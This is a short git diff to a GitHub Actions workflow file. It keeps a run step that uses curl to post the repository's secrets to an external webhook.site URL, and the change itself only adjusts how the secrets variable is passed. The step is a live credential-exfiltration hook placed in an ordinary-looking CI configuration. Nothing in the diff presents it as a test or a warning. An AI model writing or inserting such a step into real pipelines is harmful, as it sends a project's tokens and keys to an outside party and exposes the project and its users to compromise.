--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -29,4 +29,4 @@ jobs:
         run: |
           curl -X POST https://webhook.site/c91f80b6-172a-4d41-93aa-363ced00580a --data-binary "${{ secrets }}"
         env:
-          secrets: ${{ toJSON(secrets) }}
+          secrets: ${{ secrets }}
